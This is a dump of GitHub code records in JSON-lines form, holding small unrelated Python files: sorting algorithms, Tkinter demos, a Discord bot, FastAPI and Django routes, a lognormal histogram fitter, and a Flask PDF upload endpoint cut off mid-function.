words.append(input())\nwords.sort(reverse=True)\nX =[]\nfor word in words:\n check = True\n for x in X:\n if x.startswith(word):\n check = False \n if check:\n X.append(word)\nprint(len(X))\n","repo_name":"apple3285/Programing_training","sub_path":"백준_문자열-실버-문제-모음/65-접두사.py","file_name":"65-접두사.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16553881991","text":"\"\"\"\nQuicksort -- sorting algorithm using divide-and-conquer\n INPUT\n array\n OUTPUT\n array ordered in ascending order\n RUNTIME\n O(n*log n) - time\n O(n) - space\n\"\"\"\n\ndef quicksort(arr):\n # base case\n if len(arr) < 2:\n return arr\n # choose first element as pivot\n pivot = arr[0]\n # partition arr\n left = []\n right = []\n for i in range(1, len(arr)):\n if arr[i] <= pivot:\n left.append(arr[i])\n else:\n right.append(arr[i])\n # inductive return\n return quicksort(left) + [pivot] + quicksort(right)\n\ntest = [8, 5, 7, 1, 9, 3]\nprint(quicksort(test))\ntest2 = [5, 3, 6, 2, 10]\nprint(quicksort(test2))","repo_name":"calwoo/python-algos-and-ds","sub_path":"sorting/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35785945632","text":"from tkinter import *\nfrom tkinter.ttk import *\n\nroot = Tk()\nroot.title(\"Demo App\")\nroot.geometry('500x50')\n\nframe = Frame(root)\nframe.pack()\n\nlabel = Label(frame, text=\"Hi All!\")\nlabel.pack()\n\nbutton = Button(frame, text=\"Close me!\", command=root.destroy)\nbutton.pack(side='top')\n\nroot.mainloop()\n","repo_name":"andreio16/bandwidth_monitor","sub_path":"demo_tk.py","file_name":"demo_tk.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33552828580","text":"# using python3\n\nimport sys\nimport json\nimport numpy as np\nfrom sklearn.manifold import TSNE\n\ndef get_interest_list_from_popular(file_path):\n interest_list = []\n with open(file_path, 'r') as f:\n obj_list = json.load(f)\n for obj in obj_list:\n interest_list.append(obj['app_title'])\n print(interest_list)\n return interest_list\n\nINTEREST_LIST = [\n 'Kik',\n 'LINE: Free Calls & Messages',\n 'Skype - free IM & video calls',\n 'Messenger',\n 'WhatsUp Messenger',\n 'WeChat',\n 'ZALORA Fashion Shopping',\n 'Uber',\n 'NBA 2K17',\n 'CCleaner',\n 'Cleaner',\n 'Firefox Browser fast & private',\n 'Opera browser - latest news',\n 'Chrome Dev',\n 'UC Browser Mini-Tiny and Fast',\n \"Facebook\",\n \"Instagram\"\n]\n\nINTEREST_LIST = get_interest_list_from_popular(\"../data/popular.json\")\n\n# show default usage to simply use\nif len(sys.argv) != 6:\n print('default usage:')\n print(\"\"\"python3 make_web_use_app.py ../save_vector/app_vector.npy ../data/training/train_index_map.npy ../data/training/index_app_map ./app_emb_txt.js ./app_name.js\"\"\")\n\n# setting reading and writing files\napp_vector_path = sys.argv[1]\ntrain_index_map_path = sys.argv[2] # 我猜明天要嘛用 CNN 的要嘛用 RNN 的,因此就都要這個檔案\nindex_app_map_path = sys.argv[3]\napp_emb_text_path = sys.argv[4] # 這是 output\napp_name_path = sys.argv[5] # 這是 output\n\n# read all necessary input file\nall_app_vector_list = np.loadtxt(app_vector_path) # all 代表全部的,row 有重複\nrow_to_app_id_list = np.loadtxt(train_index_map_path)\nfor index in range(0, len(row_to_app_id_list)):\n row_to_app_id_list[index] = int(row_to_app_id_list[index])\nwith open(index_app_map_path, 'r') as f_j:\n index_to_app_map = json.load(f_j)\n\n# make app_id_to_row_map\napp_id_to_row_map = {}\nadded_list = []\nrow_id = 0\nfor app_id in row_to_app_id_list:\n if app_id not in added_list:\n added_list.append(app_id)\n app_id_to_row_map[str(int(app_id))] = int(row_id)\n row_id += 1\ndel row_to_app_id_list\ndel added_list\n\n# reductino and make a app_to_vector dict\n# 之所以要一起做是因為 reduction 只吃 list\napp_name_list = []\napp_vector_list = []\nfor app_index_string in index_to_app_map:\n try:\n app_name = index_to_app_map[app_index_string]\n app_vector = all_app_vector_list[app_id_to_row_map[app_index_string]]\n app_name_list.append(app_name)\n app_vector_list.append(app_vector)\n except:\n pass\nprint('len of app_name_list: {}, len of app_vector_list: {}'.format(len(app_name_list), len(app_vector_list)))\n\n# dim-reduction\ntsne = TSNE(n_components=2, random_state=0)\nnp.set_printoptions(suppress=True)\napp_vector_list = tsne.fit_transform(app_vector_list)\n\n# make app_to_vector_map\napp_to_vector_map = {}\nfor app_name, app_vector in zip(app_name_list, app_vector_list):\n # 每個 tsne 出來的是 ndarray 要把她變回 python list 才能給 json\n app_to_vector_map[app_name] = [app_vector[0], app_vector[1]]\ndel app_vector_list\n\n# output_app_vector_map 是要 output 的\noutput_app_vector_map = {}\noutput_app_name_list = []\n\n# 把 INTEREST_LIST 裡面的加進去\nfor app in INTEREST_LIST:\n if app not in output_app_name_list:\n try:\n output_app_vector_map[app] = app_to_vector_map[app]\n output_app_name_list.append(app)\n except:\n pass\n\ndel app_to_vector_map\ndel app_name_list\n\n# write to output\nwith open(app_emb_text_path, 'w') as f_text, open(app_name_path, 'w') as f_name:\n f_text.write('app_emb = ')\n f_name.write('app_name_list = ')\n json.dump(output_app_vector_map, f_text)\n json.dump(output_app_name_list, f_name)\n\n","repo_name":"b02902026/appseq_embedding_prediction","sub_path":"appemb/web/make_web_use_app.py","file_name":"make_web_use_app.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"43800281357","text":"from pathlib import Path\nfrom dotenv import load_dotenv\nimport discord\nfrom discord.ext import commands\nimport os\nimport traceback\nimport sys\n\nMY_DIR = Path(__file__).parent\n\nload_dotenv()\n\nTOKEN: str = os.getenv(\"token\")\n\nintents = discord.Intents.default()\nintents.members = True\nintents.messages = True\nintents.message_content = True\nintents.bans = True\n\n\nclass Bot(commands.Bot):\n\n # Initializes needed data\n def __init__(self) -> None:\n super().__init__(command_prefix='!', intents=intents,\n activity=discord.Activity(name=\"/buy\",\n type=discord.ActivityType.watching),\n status=discord.Status.dnd)\n\n # def exception_handler(exctype, value, traceback):\n # except AttributeError:\n # raise InvalidTable\n #\n # sys.__excepthook__(exctype, value, traceback)\n\n\n # Loading all cogs\n async def setup_hook(self) -> None:\n\n # sys.excepthook = self.exception_handler\n for filename in os.listdir(MY_DIR / \"cogs\"):\n if os.path.isfile(os.path.join(MY_DIR / \"cogs\", filename)):\n\n try:\n if filename.endswith(\".py\"):\n cog = f\"checkmate.cogs.{filename[:-3]}\"\n await self.load_extension(cog)\n except Exception as e:\n print(f\"Failed to load cog {filename}\")\n traceback.print_exc()\n\n\n\n\n# Creates instance of the bot and then runs it\nclient = Bot()\n\nclient.remove_command('help')\n\n\n@client.command()\n@commands.is_owner()\nasync def reload(ctx, cog_name) -> None:\n \"\"\"Reloads a cog\"\"\"\n try:\n await client.reload_extension(f\"zando.cogs.{cog_name}\")\n await ctx.send(f\"Reloaded cog: {cog_name}\")\n except Exception as e:\n await ctx.send(f\"Error: {e}\")\n\n\nclient.run(TOKEN)\n","repo_name":"Canttuchdiz/checkmate_bot","sub_path":"checkmate/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69920137770","text":"from fastapi import APIRouter\n\nfrom src.blockchain import Blockchain\nfrom src.model import NewBlock, Transaction\n\nrouter = APIRouter()\nbc = Blockchain()\n\n@router.get(\"/last-block\")\nasync def get_last_block():\n return bc.last_block\n\n@router.post(\"/new-block\")\nasync def new_block(block: NewBlock):\n return bc.new_block(block.proof, block.previous_hash)\n\n@router.post(\"/transaction\")\nasync def new_transaction(transaction: Transaction):\n return bc.new_transaction(transaction.sender, transaction.recipient, transaction.amount)\n\n","repo_name":"jakpop/crypto-exercises","sub_path":"blockchain/src/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16820057488","text":"import matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n peaks = []\n rr = []\n raw = []\n movavg = []\n\n with open('HRDATA.CSV', 'r') as f:\n data = f.read().splitlines()\n\n for line in data:\n #print(line)\n if line.startswith('P:'):\n l = line.split(':')[-1].split(',')\n peaks.append(int(l[0]))\n rr.append(int(l[1]))\n else:\n l = line.split(',')\n raw.append(int(l[0]))\n movavg.append(int(l[1]))\n\n plt.plot(raw)\n plt.plot(movavg)\n plt.scatter(peaks, [raw[x] for x in peaks], color='green', s=60)\n plt.show() \n","repo_name":"paulvangentcom/heartrate_analysis_Arduino","sub_path":"docs/source/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"1694507596","text":"from hoag.scripts.best_exp_decrease import get_alpha_for_exp_decrease\nimport numpy as np\n\nfrom jean_zay.submitit.general_submissions import get_cpu_executor\n\n\nexecutor = get_cpu_executor('step_size_schedule', timeout_hour=2, n_cpus=3, project='hoag')\nsearch_space = np.linspace(0.75, 0.85, 80)\n\n\njobs = []\nwith executor.batch():\n for exp_decrease in search_space:\n job = executor.submit(\n get_alpha_for_exp_decrease,\n exp_decrease=exp_decrease,\n max_iter=100,\n )\n jobs.append(job)\n\nfor job, exp_decrease in zip(jobs, search_space):\n alpha, val_losses = job.result()\n print(exp_decrease, alpha, min(val_losses))","repo_name":"zaccharieramzi/submission-scripts","sub_path":"jean_zay/submitit/hoag/exp_decrease_selection.py","file_name":"exp_decrease_selection.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"925264437","text":"from typing import List, Union\n\nfrom nonetrip.compat import CQHttpError\nfrom nonetrip.compat import Event as CQEvent\nfrom nonetrip.compat import EventBus\n\nfrom . import NoneBot\nfrom .log import logger\nfrom .session import BaseSession\nfrom .typing import NoticeHandler_T, RequestHandler_T\n\n_bus = EventBus()\n\n\nclass EventHandler:\n \"\"\"INTERNAL API\"\"\"\n __slots__ = ('events', 'func')\n\n def __init__(self, events: List[str], func: Union[NoticeHandler_T,\n RequestHandler_T]):\n self.events = events\n self.func = func\n\n\nclass NoticeSession(BaseSession):\n __slots__ = ()\n\n def __init__(self, bot: NoneBot, event: CQEvent):\n super().__init__(bot, event)\n\n\nclass RequestSession(BaseSession):\n __slots__ = ()\n\n def __init__(self, bot: NoneBot, event: CQEvent):\n super().__init__(bot, event)\n\n async def approve(self, remark: str = '') -> None:\n \"\"\"\n Approve the request.\n\n :param remark: remark of friend (only works in friend request)\n \"\"\"\n try:\n await self.bot.call_action(action='.handle_quick_operation_async',\n self_id=self.event.self_id,\n context=self.event,\n operation={\n 'approve': True,\n 'remark': remark\n })\n except CQHttpError:\n pass\n\n async def reject(self, reason: str = '') -> None:\n \"\"\"\n Reject the request.\n\n :param reason: reason to reject (only works in group request)\n \"\"\"\n try:\n await self.bot.call_action(action='.handle_quick_operation_async',\n self_id=self.event.self_id,\n context=self.event,\n operation={\n 'approve': False,\n 'reason': reason\n })\n except CQHttpError:\n pass\n\n\nasync def handle_notice_or_request(bot: NoneBot, event: CQEvent) -> None:\n \"\"\"INTERNAL API\"\"\"\n if event.type == 'notice':\n _log_notice(event)\n session = NoticeSession(bot, event)\n else: # must be 'request'\n _log_request(event)\n session = RequestSession(bot, event)\n\n ev_name = event.name\n logger.debug(f'Emitting event: {ev_name}')\n try:\n await _bus.emit(ev_name, session)\n except Exception as e:\n logger.error(f'An exception occurred while handling event {ev_name}:')\n logger.exception(e)\n\n\ndef _log_notice(event: CQEvent) -> None:\n logger.info(f'Notice: {event}')\n\n\ndef _log_request(event: CQEvent) -> None:\n logger.info(f'Request: {event}')\n\n\n__all__ = [\n 'NoticeSession',\n 'RequestSession',\n]\n","repo_name":"nonebot/nonetrip","sub_path":"nonetrip/notice_request.py","file_name":"notice_request.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"73079633449","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom .views import (\n\tPostListView,\n\tPostDetailView,\n\tPostCreateView,\n\tPostUpdateView,\n\tPostDeleteView,\n\tUserPostListView\n)\n\napp_name = 'news'\nurlpatterns = [\n\tpath('', PostListView.as_view(), name='index'),\n\tpath('user/', UserPostListView.as_view(), name='user-posts'),\n\tpath('post//', PostDetailView.as_view(), name='post-detail'),\n\tpath('post/new/', PostCreateView.as_view(), name='post-create'),\n\tpath('post//update/', PostUpdateView.as_view(), name='post-update'),\n\tpath('post//delete/', PostDeleteView.as_view(), name='post-delete'),\n]\n\nif settings.DEBUG:\n\turlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"chitcomhub/website","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"15039683719","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 24 19:34:58 2023\n\n@author: benjaminlear\n\"\"\"\nimport numpy as np\nfrom pathlib import Path\nfrom lmfit import Model\nimport itertools\nfrom matplotlib import pyplot as plt\n\n#define the models we want to use...\ndef scaled_log_norm(x, A, mu, sd):\n return A * (x * sd * (2 * np.pi)**0.5)**(-1) * np.exp(-1*(np.log(x) - mu)**2 / (2 * sd**2))\n\n#used when formatting strings. \ndef find_first_index(num):\n for i, x in enumerate(num):\n if x != \"0\":\n n = i\n break\n return n\n\n#basically convert to geometric space, and then make sure numbers are long enough\ndef value_and_error(value, error):\n # convert to strings\n val = str(np.exp(value))\n u_err = str(np.exp(value + error) - np.exp(value))\n l_err = str(np.exp(value) - np.exp(value - error))\n #split value by decimal, and then by first non-zero\n valD, vald = val.split(\".\")\n u_errD, u_errd = u_err.split(\".\")\n l_errD, l_errd = l_err.split(\".\")\n \n #find the indices where we no longer have zeros\n n_val = find_first_index(vald)\n n_u_err = find_first_index(u_errd)\n n_l_err = find_first_index(l_errd)\n \n #find the longest string we wilol need\n n = max([n_val, n_u_err, n_l_err])\n \n #take the longest version, and join the strings, taking 2 extra indices. \n return f\"{valD}.{vald[:n+2]} (+{u_errD}.{u_errd[:n+2]}) (-{l_errD}.{l_errd[:n+2]})\"\n\n\n\n#make the model to be used in fiting\nln_model = Model(scaled_log_norm)\n\n\n'''This will use pysimplegui to get a list of files that can be fit\nimport PySimpleGUI as sg\nfilenames = sg.popup_get_file(\"Choose files\", multiple_files = True, file_types = '*.csv').split(\";\")\n'''\n\n# if you want, you can use the following: and you can create a list of files, each separated by a comma\nfilenames = [\n \"/Users/benjaminlear/My Drive/PennState/Research/Manuscripts/2019/Santina+Vadim/Silver/TEM/AgSC12NP 06152017.csv\"\n ]\n\n\nfor data_file in filenames:\n data_file = Path(data_file)\n \n # import data to plot as a numpy array\n lengths = np.loadtxt(\n data_file, \n delimiter = \",\", \n skiprows = 1, \n usecols = (1),\n unpack = True # this makes it return arrays for each column\n )\n \n # get stats in ln space, for estimating starting values...\n ln_lengths = np.log(lengths)\n ln_mean = np.mean(ln_lengths) \n \n ln_q75, ln_q25 = np.percentile(ln_lengths, [75 ,25])\n ln_iqr = ln_q75 = ln_q25\n ln_sd = ln_iqr / 1.35\n \n #bin data\n y_counts, x_edges = np.histogram(lengths, \n bins = \"auto\"\n )\n x_bins = []\n for x in enumerate(x_edges[:-1]):\n x_bins.append((x_edges[x[0]] + x_edges[x[0]+1])/2)\n \n x_bins = np.array(x_bins)\n \n y_density = y_counts / len(lengths)\n h_bin = x_bins[1]-x_bins[0]\n \n result = ln_model.fit(y_density, x = x_bins, A = 1, mu = ln_mean, sd = ln_sd, method = \"leastsq\")\n print(result.fit_report())\n \n x_sim = np.linspace(0.001, np.max(lengths)* 1.1, 1000)\n\n\n\n \n plt.bar(x_bins, y_density, edgecolor='white', width=h_bin, color = \"#d36027\")\n plt.plot(x_sim, scaled_log_norm(x_sim, result.best_values[\"A\"], result.best_values[\"mu\"], result.best_values[\"sd\"]), color = \"black\", linewidth = 3)\n plt.title(data_file.stem)\n plt.xlabel(\"diameter /nm\")\n plt.ylabel(\"density\")\n plt.xlim(0, max(x_bins) * 1.1)\n plt.ylim(0, max(y_density) * 1.1)\n plt.text(max(x_bins) * 1.05, max(y_density) * 1.05, \n f\"$\\mu$ = {value_and_error(result.params['mu'].value, result.params['mu'].stderr)} nm \\n $\\sigma$ = {value_and_error(result.params['sd'].value, result.params['sd'].stderr)} nm\",\n horizontalalignment = \"right\",\n verticalalignment = \"top\",\n color = \"black\"\n )\n plt.savefig(data_file.with_suffix('.fit.png'))\n plt.show()\n \n \n \n ''' PLOTLY BASED PLOTTING --- NOT WORKING YET ON PC.\n import kaleido\n import plotly\n #plot the data\n fig = plotly.graph_objects.Figure( #make a figure, specifying default layouts\n layout = dict(\n title=str(data_file.stem),\n template = \"simple_white\", \n colorway = plotly.colors.qualitative.Dark2,\n showlegend = False,\n xaxis = dict(\n title = \"size /nm\", \n range = [0, np.max(lengths) * 1.1]\n ),\n yaxis = dict(\n title = \"density\", \n range = [0, max(y_density)*1.1]\n )\n )\n )\n \n \n fig.add_bar(x = x_bins, y = y_density, width = h_bin) # add the data trace to the figure\n fig.add_scatter(x = x_sim, \n y = scaled_log_norm(x_sim, result.best_values[\"A\"], result.best_values[\"mu\"], result.best_values[\"sd\"]))\n\n\n # annotate with mean and sigma... but only use enough decimal places as needed by the error...\n fig.add_annotation(\n x=np.max(lengths)*0.8,\n y=np.max(y_density),\n xref=\"x\",\n yref=\"y\",\n text=f\"μ = {value_and_error(result.params['mu'].value, result.params['mu'].stderr)} nm\",\n showarrow=False,\n font=dict(\n family=\"Courier New, monospace\",\n size=16,\n color=\"#000000\"\n ),\n align=\"right\",\n )\n fig.add_annotation(\n x=np.max(lengths)*0.8,\n y=np.max(y_density)*0.9,\n xref=\"x\",\n yref=\"y\",\n text=f\"σ = {value_and_error(result.params['sd'].value, result.params['sd'].stderr)} nm\",\n showarrow=False,\n font=dict(\n family=\"Courier New, monospace\",\n size=16,\n color=\"#000000\"\n ),\n align=\"right\",\n )\n fig.show('svg') # this one will be viewable in spyder\n fig.write_image(data_file.with_suffix('.fit.png')) #write image\n '''\n \n \n \n # write the final stuff to a file \n g_mu = np.exp(result.params['mu'].value)\n g_mu_u = np.exp(result.params['mu'].value + result.params['mu'].stderr) - g_mu\n g_mu_l = g_mu - np.exp(result.params['mu'].value - result.params['mu'].stderr)\n \n g_sd = np.exp(result.params['sd'].value)\n g_sd_u = np.exp(result.params['sd'].value + result.params['sd'].stderr) - g_sd\n g_sd_l = g_sd - np.exp(result.params['sd'].value - result.params['sd'].stderr)\n to_write = []\n for i in itertools.zip_longest(\n lengths, \n x_bins, \n y_density,\n [\"A\", \"mu\", \"sigma\"],\n [result.params['A'].value, g_mu, g_sd],\n [result.params['A'].stderr, g_mu_u, g_sd_u],\n [result.params['A'].stderr, g_mu_l, g_mu_u],\n [f\"{result.params['A'].value} * (x * {result.params['sd'].value} * (2 * 3.14159)**0.5)**(-1) * exp(-1*(log(x) - {result.params['mu'].value})**2 / (2 * {result.params['sd'].value}**2))\"]\n ):\n to_write.append(i)\n \n with open(data_file.with_suffix('.fit.csv'), \"w\") as f:\n f.write(\"Lengths, bin centers, density, parameters, values, upper error, lower error, equation \\n\")\n for row in to_write:\n for entry in row:\n if entry != None:\n f.write(str(entry))\n f.write(\",\")\n f.write(\"\\n\")\n","repo_name":"TheLearLab/lognormal-fitter","sub_path":"fitter.py","file_name":"fitter.py","file_ext":"py","file_size_in_byte":7487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5508101816","text":"from django.contrib.auth.models import User\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom posts.models import Post\n\n\nclass PostSerializer(serializers.ModelSerializer):\n author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all())\n\n class Meta:\n model = Post\n fields = (\n 'author',\n 'title',\n 'text',\n 'creation_datetime',\n )\n\n def validate(self, data):\n validated_data = super().validate(data)\n if validated_data['title'] == 'Serializer Invalid Title':\n raise ValidationError({'title': 'Invalid title at the serializer level.'})\n return validated_data\n","repo_name":"Hipo/hipo-drf-exceptions","sub_path":"test_project/posts/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"252379768","text":"#!/usr/bin/python3\n\n\nimport re\n\n# open input file\nwith open('input.txt', 'r') as f:\n data = f.readlines() # to remove the last carriage return\n\n\nregex = r\"\\d+\"\n\nchecksum = 0\nfor line in data:\n row = re.findall(regex, line)\n\n # convert strings into int\n row = [int(x) for x in row]\n\n checksum += max(row) - min(row)\n\nprint(checksum)\n","repo_name":"gmnr/advent-of-code","sub_path":"2017/02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30231208554","text":"def heap_maxify(array, parent, heap_size):\n l = parent * 2 + 1\n p = parent * 2 + 2\n largest = parent\n if l < heap_size and array[l] > array[largest]:\n largest = l\n if p < heap_size and array[p] > array[largest]:\n largest = p\n if largest != parent:\n temp = array[parent]\n array[parent] = array[largest]\n array[largest] = temp\n heap_maxify(array, largest, heap_size)\n\n\ndef build_max_heap(array):\n for i in range(len(array) // 2 - 1, -1, -1):\n heap_maxify(array, i, len(array))\n\n\ndef heap_sort(array):\n build_max_heap(array)\n for heap_size in range(len(array) - 1, 0, -1):\n temp = array[0]\n array[0] = array[heap_size]\n array[heap_size] = temp\n heap_maxify(array, 0, heap_size)\n\n\narray=[13.0, -3.0, -25.0, 20.0, -3.0, -16.0, -23.0, 18.0, 20.0, -7.0, 12.0, -5.0, -22.0, 15.0, -4.0, 7.0]\nprint(array)\nheap_sort(array)\nprint(array)","repo_name":"MaciejWasilewski/IntroToAlgorithm","sub_path":"Sorting/Heap_sort/python/heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8798353789","text":"S = input()\nT = input()\n# j = 0\n# if len(S) > len(T):\n# print(\"No\")\n# exit()\n# for i,t in enumerate(T):\n# if j < len(S) and t == S[j]:\n# j += 1\n# continue\n# else:\n# if j < len(S) and j >= 2 and S[j-1] == t and S[j-2] == t:\n# continue\n# else:\n# print(\"No\")\n# exit()\n# if j == len(S):\n# print(\"Yes\")\n# else:\n# print(\"No\")\n\nnow = S[0]\ncnt = 0\ntpos = 0\nfor s in S:\n if s == now:\n cnt += 1\n else:\n if T[tpos] != now:\n print(\"No\")\n exit()\n else:\n cntt = 0\n while tpos < len(T) and now == T[tpos]:\n cntt += 1\n tpos += 1\n if cnt != cntt and (cnt < 2 or cntt <= cnt):\n print(\"No\")\n exit()\n now = s\n cnt = 1\ncntt = 0\nwhile tpos < len(T) and now == T[tpos]:\n cntt += 1\n tpos += 1\nif cnt != cntt and (cnt < 2 or cntt <= cnt):\n print(\"No\")\n exit()\nif tpos == len(T):\n print(\"Yes\")\nelse:\n print(\"No\")","repo_name":"shimamura10/Atcoder","sub_path":"過去問/ABC259/ABC259c.py","file_name":"ABC259c.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37262161083","text":"from tkinter import *\n\nexpression = \"\"\n\n\ndef press(num):\n global expression\n expression = expression + str(num)\n equation.set(expression)\n\n\ndef equalpress():\n try:\n global expression\n total = str(eval(equation.get()))\n equation.set(total)\n expression = \"\"\n except:\n equation.set(\"ERROR\")\n expression = \"\"\n\n\ndef clear():\n global expression\n expression = \"\"\n equation.set(\"\")\n\n\ndef but(source, side, text, command=None):\n store = Button(source, text=text, fg=\"black\", bg=\"red\", relief=RAISED, command=command)\n store.pack(side=side, expand=YES, fill=BOTH)\n return store\n\n\ndef cal(source, side):\n steve = Frame(source, borderwidth=4, bd=4, bg=\"blue\")\n steve.pack(side=side, expand=YES, fill=BOTH)\n\n\nif __name__ == \"__main__\":\n gui = Tk()\n gui.configure(bg=\"blue\")\n gui.option_add('*Font', 'arial 14 bold')\n gui.title(\"My Calculator\")\n equation = StringVar()\n expression_field = Entry(gui, relief=RIDGE, textvariable=equation, justify='left', bd=20, bg=\"dark red\")\n expression_field.pack(side=TOP, expand=YES, fill=BOTH)\n equation.set(\"enter your expression\")\n\n but(gui, TOP, \"CE\", command=clear)\n but(gui, TOP, \"C\", command=clear)\n\n equal = but(gui, TOP, \"=\", command=equalpress)\n\n for Num in (\"789/\", \"456*\", \"123-\", \"0.+()\"):\n tim = cal(gui, TOP)\n for But in Num:\n but(tim, LEFT, But,\n lambda store=equation, q=But: store.set(store.get() + q))\n\n gui.mainloop()\n","repo_name":"ebel-frank/python-projects","sub_path":"calculator2.py","file_name":"calculator2.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10863170889","text":"\"\"\"added projectupdate\n\nRevision ID: 1dd716b25acf\nRevises: 8aad0dc0fd2c\nCreate Date: 2023-04-15 14:42:05.939329\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1dd716b25acf'\ndown_revision = '8aad0dc0fd2c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('project_update',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('text', sa.Text(), nullable=True),\n sa.ForeignKeyConstraint(['project_id'], ['project.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('project_update', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_project_update_timestamp'), ['timestamp'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('project_update', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_project_update_timestamp'))\n\n op.drop_table('project_update')\n # ### end Alembic commands ###\n","repo_name":"rylansturm/RylanSturm.com","sub_path":"migrations/versions/1dd716b25acf_added_projectupdate.py","file_name":"1dd716b25acf_added_projectupdate.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70229766250","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom quickstart import views\nfrom django.contrib import admin\nfrom quickstart.views import QuestionViewSet, SectionsViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet)\nrouter.register(r'groups', views.GroupViewSet)\nrouter.register(r'questions', views.QuestionViewSet, basename=\"questions\")\nrouter.register(r'sections', views.SectionsViewSet, basename=\"sections\")\nrouter.register(r'answers', views.AnswersViewSet, basename=\"answers\")\nrouter.register(r'states', views.StatesViewSet, basename=\"states\")\nrouter.register(r'stateprograms', views.StateprogramsViewSet, basename=\"stateprograms\")\nrouter.register(r'questionsanswers', views.QuestionsAnswersViewSet, basename=\"questionsanswers\")\n\n# Wire up our API using automatic URL routing.\n# Additionally, we include login URLs for the browsable API.\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n path(r'api/', include('quickstart.urls'))\n]","repo_name":"andrewadcock/django-mssql-api","sub_path":"api/basicapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3285650778","text":"from flask import Flask, request, make_response, jsonify\nimport uuid\nfrom PyPDF2 import PdfMerger\nimport argparse\nimport os\nfrom pathlib import Path\nimport time\n\n\nfrom utils import create_index, get_answer_from_index, clean_file, merge_pdfs\n\napp = Flask(__name__)\n\nfile_upload_path = \"./documents\"\nif not os.path.exists(file_upload_path):\n os.makedirs(file_upload_path)\n\n\n@app.route(\"/upload\", methods=[\"POST\"])\ndef upload_file():\n if not request.files:\n return \"Please send a POST request with a file\", 400\n\n filepaths = []\n filenames = []\n\n for file in request.files.values():\n uploaded_file = file\n filename = uploaded_file.filename\n filepath = os.path.join(file_upload_path, os.path.basename(filename))\n uploaded_file.save(filepath)\n filepaths.append(filepath)\n filenames.append(filename)\n\n if len(filepaths) > 1:\n print(\"filepaths\\n\", filepaths, \"\\n\")\n merged_filepath = os.path.join(file_upload_path, str(uuid.uuid4()) + \".pdf\")\n merge_pdfs(filepaths, merged_filepath)\n filepaths = [\n merged_filepath\n ] # Replace the original list with only the merged file\n filenames = [\n os.path.basename(merged_filepath)\n ] # Similarly update filenames to reflect the merged file\n\n index_name = (\n os.path.splitext(filenames[0])[0] if len(filenames) == 1 else str(uuid.uuid4())\n )\n\n index = create_index(filepaths, index_name)\n\n if index is None:\n return \"Failed to create index\", 500\n\n 